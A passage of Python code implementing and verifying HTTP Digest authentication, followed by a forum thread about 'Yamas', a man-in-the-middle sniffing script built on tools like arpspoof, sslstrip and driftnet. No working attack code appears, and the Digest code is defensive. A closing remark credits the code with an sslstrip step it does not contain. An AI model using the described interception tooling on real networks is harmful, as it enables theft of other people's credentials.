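def digest_response(ha1_hex, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response = MD5(HA1:nonce:nc:cnonce:qop:HA2) with HA2 = MD5(method:uri)."""
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def client_authorization(username, password, realm, method, uri, nonce, nc, cnonce):
    """Build the Authorization header a browser sends after the 401 challenge."""
    resp = digest_response(ha1(username, realm, password), method, uri, nonce, nc, cnonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", qop=auth, nc={nc}, cnonce="{cnonce}", response="{resp}"')


# key="quoted value" or key=bare-token, comma separated
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_authorization(header):
    if not header.startswith("Digest "):
        raise ValueError("not a Digest Authorization header")
    fields = {}
    for m in FIELD.finditer(header[len("Digest "):]):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def server_verify(header, stored_ha1, method, issued_nonce):
    """Server check: the nonce must be the one we issued (no replay) and the
    response must match what our stored HA1 predicts for this method and URI."""
    try:
        f = parse_authorization(header)
        if f["nonce"] != issued_nonce:
            return False
        expected = digest_response(stored_ha1, method, f["uri"], f["nonce"],
                                   f["nc"], f["cnonce"], f.get("qop", "auth"))
        return hmac.compare_digest(expected, f["response"])
    except (KeyError, ValueError):
        return False


def demo():
    """One exchange with constructed values; returns what a sniffer and the server see."""
    username, realm = "alice", "Protected Area"
    password = "correct horse battery staple"
    issued_nonce = "5f1a9c3be0d4c7a2"       # constructed server nonce
    stored = ha1(username, realm, password)  # htdigest-style record on the server
    header = client_authorization(username, password, realm, "GET", "/private/",
                                  issued_nonce, "00000001", "9a3f7b21")
    return {
        "header": header,
        "password_on_wire": password in header,
        "verified": server_verify(header, stored, "GET", issued_nonce),
        "replayed_with_new_nonce": server_verify(header, stored, "GET", "c0ffee0000000001"),
        "replayed_other_method": server_verify(header, stored, "POST", issued_nonce),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Digest keeps the password itself off the wire, but the captured HA1-based response is still an offline-guessable MD5 construction; what actually removes the sslstrip step this script relies on is serving the site over TLS and sending an HSTS header so the browser refuses the downgraded plain-HTTP page.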

  • #2
    To thank you for this delicious script, while waiting for it to keep improving again and again: well done for the initiative, and good luck with its next evolution, which can only be even more interesting.

    Big +30 ^^


  • #3
    Up.

    So, have any small improvements been made to it?


  • #4
    Nope, not too many ideas, and a lazy streak where the proverbial hair in the palm is more like a tree. I thought about Hamster and Ferret, that kind of thing, but you see them everywhere, and even though it was "yet another", I consider it a tool in its own right, worth what it's worth, but sui generis! So since it was designed in "stop the script kiddies, try to understand what you're doing" mode, I find it quite sufficient!

    On the other hand, I'd be up for making a version less oriented towards "I explain everything that's going on", to turn it into something more functional, let's say. And why not with a "For THC" label.

    Edit: that said, since the version posted here, yes, there have been *small* improvements.


  • #5
    Hi hi!

    A small bump to give some news about Yamas.

    For the BT version, driftnet should be added soon, and maybe urlsnarf, even though I'm a bit sceptical about the latter. Maybe a small fix for nmap crashing. Problems have been reported to me, and since it's been a while since I tested and updated my BT...

    For the Maemo version, some "colleagues" are working on porting arpspoof to it, so the script will be adapted accordingly. It will also be an opportunity to rework the code a bit! The problem is that I can't push to the Maemo repo, so we'll need the help of another friend.

    Anyway, if you don't know it yet, why not give it a try? It's a fairly simple script, all things considered, and it might make you realise that you need to be vigilant on the internet, even at home.

    Have fun!


  • #6
    Small bump to say it's up to date for BT5R3